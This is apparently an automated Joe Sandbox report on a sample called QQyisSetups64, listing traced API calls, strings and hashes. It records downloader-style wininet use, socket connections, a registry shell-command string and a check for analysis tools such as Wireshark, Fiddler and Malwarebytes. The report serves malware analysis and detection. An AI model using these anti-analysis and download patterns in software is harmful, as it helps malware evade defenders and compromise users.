                                                                                                                                                                                                                      • __init_pointers.LIBCMT ref: 02C89B8C
                                                                                                                                                                                                                      • EncodePointer.KERNEL32(?,?,02C875E2,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C89B9D
                                                                                                                                                                                                                      • EncodePointer.KERNEL32(?,?,02C875E2,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C89BAA
                                                                                                                                                                                                                      • EncodePointer.KERNEL32(?,?,02C875E2,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C89BB7
                                                                                                                                                                                                                      • EncodePointer.KERNEL32(?,?,02C875E2,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C89BC4
                                                                                                                                                                                                                      • DecodePointer.KERNEL32(Function_00009929,?,?,02C875E2,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C89BE5
                                                                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 02C89BFA
                                                                                                                                                                                                                      • DecodePointer.KERNEL32(00000000,?,?,02C875E2,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C89C14
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02C89C26
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                                                                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                                                                      • API String ID: 3698121176-3819984048
                                                                                                                                                                                                                      • Opcode ID: 62f0e7148cf59c0c4f7e1d2b06d85393eeb0f3cdcf6f42e60c7c7e01b66aae89
                                                                                                                                                                                                                      • Instruction ID: eb3a0cf12c185f346ade5e1bdbbd32b1e0fdc620fed959b80b5abc0099d08c22
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 62f0e7148cf59c0c4f7e1d2b06d85393eeb0f3cdcf6f42e60c7c7e01b66aae89
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A314131D80214AFDB21BF75BD4C72ABBA6AB8479CB544F2AD404D3250EB358861EF50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset$_wcsrchrlstrcat$EnvironmentExpandStringslstrlenwsprintf
                                                                                                                                                                                                                      • String ID: "%1$%s\shell\open\command$D$WinSta0\Default
                                                                                                                                                                                                                      • API String ID: 3970221696-33419044
                                                                                                                                                                                                                      • Opcode ID: 2ff0fa35aefb82dfc8a28ca63567eeb9306a8bc4635a9fd78f3f663c68b7db41
                                                                                                                                                                                                                      • Instruction ID: ac8b06cbd46ae32c1ac644ff6bf02918ec343c284553a05828aaa9909d7fa7b2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff0fa35aefb82dfc8a28ca63567eeb9306a8bc4635a9fd78f3f663c68b7db41
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF51ECB5A8031D66DF20FB64DC49FEEB7789F54710F004599E70DAA081EA749684CFB1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(wininet.dll), ref: 03787CC3
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 03787CD7
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 03787CF7
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InternetOpenUrlW), ref: 03787D16
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 03787D53
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 03787D7E
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 03787D8C
                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 03787DDB
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 03787DF9
                                                                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 03787E01
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 03787E0D
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 03787E28
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProc$Library$FileFree$CloseCreateHandleLoadSleepWrite_memset
                                                                                                                                                                                                                      • String ID: InternetCloseHandle$InternetOpenUrlW$InternetOpenW$InternetReadFile$MSIE 6.0$wininet.dll
                                                                                                                                                                                                                      • API String ID: 1463273941-1099148085
                                                                                                                                                                                                                      • Opcode ID: 60f73ef77f829b4b31ef83a58e1dd02cf1561b213399b717c3f8abf7695ade3a
                                                                                                                                                                                                                      • Instruction ID: 74882c38b7170155afb8afa737488576fe14d99f658da769471199345bcee77f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60f73ef77f829b4b31ef83a58e1dd02cf1561b213399b717c3f8abf7695ade3a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0041B571A8061CABD724EB648C41FEEB3F8BF84700F14C5A9E649A6180DE745A458FE4
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0378455A
                                                                                                                                                                                                                      • timeGetTime.WINMM ref: 0378457B
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0378459B
                                                                                                                                                                                                                      • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 037845BD
                                                                                                                                                                                                                      • SwitchToThread.KERNEL32 ref: 037845D7
                                                                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 03784620
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 03784644
                                                                                                                                                                                                                      • send.WS2_32(?,037A49C0,00000010,00000000), ref: 03784668
                                                                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 03784686
                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 03784691
                                                                                                                                                                                                                      • WSACloseEvent.WS2_32(?), ref: 0378469F
                                                                                                                                                                                                                      • shutdown.WS2_32(?,00000001), ref: 037846B3
                                                                                                                                                                                                                      • closesocket.WS2_32(?), ref: 037846BD
                                                                                                                                                                                                                      • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 037846F6
                                                                                                                                                                                                                      • SetLastError.KERNEL32(000005B4), ref: 0378470A
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0378472B
                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 03784743
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: EventExchangeInterlockedThread$CloseCurrentErrorLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1692523546-0
                                                                                                                                                                                                                      • Opcode ID: becca5bf8f31025d59993257870126da4d59b812d4718422f08e9c934a0ead02
                                                                                                                                                                                                                      • Instruction ID: 373ad21def5fe24fb365f6fa444156be7d5c573eced1a84dcf4344cbb2e85c15
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: becca5bf8f31025d59993257870126da4d59b812d4718422f08e9c934a0ead02
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7291D074640B06EFC724EF26D888BAAF7A9FF44700F148519E5168BA84D7B5F891CBD0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset$swprintf$_malloc
                                                                                                                                                                                                                      • String ID: %s %s$onlyloadinmyself$plugmark
                                                                                                                                                                                                                      • API String ID: 1873853019-591889663
                                                                                                                                                                                                                      • Opcode ID: 832ce470dba4f7c0ce2d477d088d548af2410064a66793fa5db554db2c5c5ec4
                                                                                                                                                                                                                      • Instruction ID: c9d8b1612ee0a56ca8c9cd3cd256a2d6ea9415e7299856d6d4083d111b35a987
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 832ce470dba4f7c0ce2d477d088d548af2410064a66793fa5db554db2c5c5ec4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4181B5B9A80300ABEB10FF14EC8AF6B7764AF55710F184169ED195F383E771E911C6A2
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 03785CD3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: VisibleWindow
                                                                                                                                                                                                                      • String ID: ApateDNS$Capsa$CurrPorts$Fiddler$Malwarebytes$Metascan$Port$Process$Sniff$TCPEye$TaskExplorer$Wireshark
                                                                                                                                                                                                                      • API String ID: 1208467747-3439171801
                                                                                                                                                                                                                      • Opcode ID: 9c5605045a94aae60822ce5207fe9ed208529c410d24882d77f15b1cdc4dc536
                                                                                                                                                                                                                      • Instruction ID: 9fe05f481927fbbf13571af6681c52de59136b3e8cbbec5ab45f781cebcd1bc7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c5605045a94aae60822ce5207fe9ed208529c410d24882d77f15b1cdc4dc536
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6941BFE6EC1B156AEE62FA3A7C06FDF314C0DA34B6F090226EC48AC105F649921540EE
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 02C8455A
                                                                                                                                                                                                                      • timeGetTime.WINMM ref: 02C8457B
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02C8459B
                                                                                                                                                                                                                      • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C845BD
                                                                                                                                                                                                                      • SwitchToThread.KERNEL32 ref: 02C845D7
                                                                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 02C84620
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 02C84644
                                                                                                                                                                                                                      • send.WS2_32(?,02C97440,00000010,00000000), ref: 02C84668
                                                                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 02C84686
                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 02C84691
                                                                                                                                                                                                                      • WSACloseEvent.WS2_32(?), ref: 02C8469F
                                                                                                                                                                                                                      • shutdown.WS2_32(?,00000001), ref: 02C846B3
                                                                                                                                                                                                                      • closesocket.WS2_32(?), ref: 02C846BD
                                                                                                                                                                                                                      • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 02C846F6
                                                                                                                                                                                                                      • SetLastError.KERNEL32(000005B4), ref: 02C8470A
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02C9FA44
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: EventThread$CloseCurrentErrorExchangeInterlockedLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3448239111-0
                                                                                                                                                                                                                      • Opcode ID: 08385932a098717e15b71ce20b63fb303f9890e20f53e40ae42869245a261d1e
                                                                                                                                                                                                                      • Instruction ID: 66a22edad97b9b14a80f6353bb7fafe7210f3df72dbcb607fe7528510f354a0e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08385932a098717e15b71ce20b63fb303f9890e20f53e40ae42869245a261d1e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B051FC71A40612EFC739EF64D88CBA9B7A5FF84749F408625E50187A80C774FAA1CBD0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetLastError.KERNEL32(0000000D,?,?,?,?,?,?,0378A8C1,?,?), ref: 0378DA43
                                                                                                                                                                                                                      • SetLastError.KERNEL32(000000C1,?,?,?,?,?,?,0378A8C1,?,?), ref: 0378DA62
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1452528299-0
                                                                                                                                                                                                                      • Opcode ID: cf98c28d13462270ddd523fec1996e1f4117be55b0baec8ec6b8897d4c91a5c3
                                                                                                                                                                                                                      • Instruction ID: 6f810af9cdcfe10dc400eeb85f695dd488aff1de3bc97c9ef32ac6d5d0002516
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf98c28d13462270ddd523fec1996e1f4117be55b0baec8ec6b8897d4c91a5c3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0581E372740605AFD730EFA9D884BAAB7E4FB48315F148569E909C7AC1E775E800CBD1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0378C63D
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0378C64C
                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,00000000), ref: 0378C66F
                                                                                                                                                                                                                        • Part of subcall function 0378C81E: RegCloseKey.ADVAPI32(80000000,0378C7FA), ref: 0378C82B
                                                                                                                                                                                                                        • Part of subcall function 0378C81E: RegCloseKey.ADVAPI32(00000000), ref: 0378C834
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Close_memset$Open
                                                                                                                                                                                                                      • String ID: %08X
                                                                                                                                                                                                                      • API String ID: 4292648718-3773563069
                                                                                                                                                                                                                      • Opcode ID: c2c5f8d2b5ed8a6a4625b067ef2bc145dcc351526bddb05f84e55c81860eb56f
                                                                                                                                                                                                                      • Instruction ID: ad54866f7ee694c59b03ed84967f9b1cdeb13d238d211b72884b17eafb030875
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2c5f8d2b5ed8a6a4625b067ef2bc145dcc351526bddb05f84e55c81860eb56f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 255144F2A40219ABDB24EF50DC85FEAB778EB44714F40869DF705A6180D774AB44CBA4
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • socket.WS2_32(00000002,00000002,00000011), ref: 03783710
                                                                                                                                                                                                                      • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 03783749
                                                                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 03783766
                                                                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 03783779
                                                                                                                                                                                                                      • WSACreateEvent.WS2_32 ref: 0378377B
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,037B1F0C), ref: 0378378D
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,037B1F0C), ref: 03783799
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,037B1F0C), ref: 037837B8
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,037B1F0C), ref: 037837C4
                                                                                                                                                                                                                      • gethostbyname.WS2_32(00000000), ref: 037837D2
                                                                                                                                                                                                                      • htons.WS2_32(?), ref: 037837F8
                                                                                                                                                                                                                      • WSAEventSelect.WS2_32(?,?,00000030), ref: 03783816
                                                                                                                                                                                                                      • connect.WS2_32(?,?,00000010), ref: 0378382B
                                                                                                                                                                                                                      • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,037B1F0C), ref: 0378383A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1455939504-0
                                                                                                                                                                                                                      • Opcode ID: a98f9c5eb8ec943e3dfdffdb64bf263dc404b939d425f52885a85b2cf7ed3613
                                                                                                                                                                                                                      • Instruction ID: ea616fd76319886af4143f2b0a6bce4d3ad3af7ce48cae51e4f2bb874e752a44
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a98f9c5eb8ec943e3dfdffdb64bf263dc404b939d425f52885a85b2cf7ed3613
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30415E75A40205ABE724EBA4DC89F7BB7B8EB89B10F104919F7159A2C1C774A900DB61
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • socket.WS2_32(00000002,00000002,00000011), ref: 02C83710
                                                                                                                                                                                                                      • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 02C83749
                                                                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 02C83766
                                                                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 02C83779
                                                                                                                                                                                                                      • WSACreateEvent.WS2_32 ref: 02C8377B
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,02C9D990), ref: 02C8378D
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,02C9D990), ref: 02C83799
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,02C9D990), ref: 02C837B8
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,02C9D990), ref: 02C837C4
                                                                                                                                                                                                                      • gethostbyname.WS2_32(00000000), ref: 02C837D2
                                                                                                                                                                                                                      • htons.WS2_32(?), ref: 02C837F8
                                                                                                                                                                                                                      • WSAEventSelect.WS2_32(?,?,00000030), ref: 02C83816
                                                                                                                                                                                                                      • connect.WS2_32(?,?,00000010), ref: 02C8382B
                                                                                                                                                                                                                      • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,02C9D990), ref: 02C8383A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1455939504-0
                                                                                                                                                                                                                      • Opcode ID: fc0e2c650aabd6955bb1f752be8a859d595c3e2f688b605ccca17a7e52f9dde7
                                                                                                                                                                                                                      • Instruction ID: 4cc43e4de4ab3bea8181f8cd2f6e7bc7db5a2cb94ea8e8e8b7043e3674ffdea1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc0e2c650aabd6955bb1f752be8a859d595c3e2f688b605ccca17a7e52f9dde7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42416FB1A40244ABE710EFA5DC89F7FB7B8EF88714F508619FA15A72C0C771A904CB61
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                                      • String ID: !jWW$.$_$e$i$l${vU_
                                                                                                                                                                                                                      • API String ID: 2102423945-159827627
                                                                                                                                                                                                                      • Opcode ID: 616728f120ea76b6708cf09b79b5274985df2719d774fb6e82631f5eb7c08bb3
                                                                                                                                                                                                                      • Instruction ID: 8e66d5d846fb1e7c39b5ea00a394b92d49156e6723a59621ff660ba35d948a1a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 616728f120ea76b6708cf09b79b5274985df2719d774fb6e82631f5eb7c08bb3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5091A87DA40214AFE720EF64CC84FAA77BAFB85700F548159FA099B244D7B5DA40CF61
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetLocalTime.KERNEL32(?,453DC9E3), ref: 0378AA58
                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0378AA8F
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0378AAA7
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0378AABA
                                                                                                                                                                                                                        • Part of subcall function 03788020: lstrlenW.KERNEL32(?), ref: 03788038
                                                                                                                                                                                                                        • Part of subcall function 03788020: _memset.LIBCMT ref: 03788042
                                                                                                                                                                                                                        • Part of subcall function 03788020: lstrlenW.KERNEL32(?), ref: 0378804B
                                                                                                                                                                                                                        • Part of subcall function 03788020: lstrlenW.KERNEL32(?), ref: 03788056
                                                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0378ABBE
                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?,?,?,?,?), ref: 0378AC6E
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0378ACAA
                                                                                                                                                                                                                        • Part of subcall function 0378F707: _malloc.LIBCMT ref: 0378F721
                                                                                                                                                                                                                        • Part of subcall function 03789730: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,453DC9E3,00000000,?,?,?,00000000,037A125B,000000FF,?,0378E04E,00000000), ref: 03789773
                                                                                                                                                                                                                        • Part of subcall function 03789730: InitializeCriticalSectionAndSpinCount.KERNEL32(0378E1AE,00000000,?,?,?,00000000,037A125B,000000FF,?,0378E04E), ref: 03789812
                                                                                                                                                                                                                        • Part of subcall function 03789730: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,037A125B,000000FF,?,0378E04E), ref: 03789850
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
